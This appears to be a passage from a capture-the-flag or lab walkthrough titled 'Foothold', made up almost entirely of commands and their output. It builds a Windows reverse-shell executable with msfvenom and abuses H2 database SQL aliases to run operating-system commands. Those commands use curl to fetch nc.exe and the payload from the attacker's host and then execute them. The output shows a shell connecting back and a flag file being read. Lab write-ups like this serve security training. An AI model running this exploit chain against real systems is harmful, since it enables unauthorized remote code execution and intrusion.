Foothold

$ python -m http.server 80

$ nc -lnvp 1337                              
listening on [any] 1337 ..

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1337 -f exe -o pwned.exe

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("curl 192.168.45.233/nc.exe -o C:\\programdata\\nc.exe").getInputStream()).useDelimiter("\\Z").next()');

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\programdata\\pwned.exe").getInputStream()).useDelimiter("\\Z").next()');

$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.241.66] 50323
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\H2\service>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\Program Files (x86)\H2\service>echo %userprofile%
echo %userprofile%
C:\Users\tony

C:\Program Files (x86)\H2\service>type C:\Users\tony\Desktop\local.txt
type C:\Users\tony\Desktop\local.txt
810e1abdd845f7b1534359416079bf77

C:\Program Files (x86)\H2\service>ipconfig
ipconfig
'ipconfig' is not recognized as an internal or external command,
operable program or batch file.